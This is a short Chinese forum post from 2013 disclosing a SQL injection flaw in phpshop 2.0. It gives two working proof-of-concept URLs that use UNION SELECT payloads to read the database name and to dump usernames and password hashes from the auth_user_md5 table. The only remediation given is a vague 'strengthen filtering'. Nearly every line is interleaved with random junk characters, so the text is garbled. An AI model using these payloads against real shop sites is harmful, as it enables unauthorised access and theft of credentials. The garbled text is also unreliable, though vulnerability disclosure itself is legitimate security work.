标题 : phpshop 2.0 SQL Injection Vulnerability
( {5 H* P* u+ _% U- B- E/ H# |4 j! h3 L+ M/ p& ?3 m
作者 : By onestree" n+ g6 d5 S7 w: J
下载地址 : http://code.google.com/p/phpshop/downloads/list+ c2 ]/ r* u$ N
测试地址: windows 7 / ubuntu
) }2 O9 {9 }4 m$ c; ]- l - z+ y' _/ r. h$ W, f8 s6 ]5 K. z
. ?: D: n7 V* L9 _: N F/ y
SQLi p0c:
& [+ s& q# m3 k0 ? [0 p: u: X
0 j+ |+ ^" n, p" \6 m" b==================, ]* N+ N* M; Q9 X, Y1 F e
/ [" I0 S4 @8 k2 v
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
. t1 o% d4 u* q7 z+ q" @union select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --( `; v6 V% S# c+ p/ e
3 o! m" r5 S' q, o2 ]3 K' bhttp://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--$ B% @; ~1 g6 J2 Y
8 k" p& \* q4 f1 k% x+ e
修复:
; o6 u7 i$ [1 ?' @) Z, M加强过滤
& p4 E+ v( A% v3 D( r. X: Y- j5 U) }# u% @, P2 c4 @$ Z# T [
f; l/ c, Y- t% C! G2 @
|
发表于 2013-1-18 18:24:10
收藏
支持
反对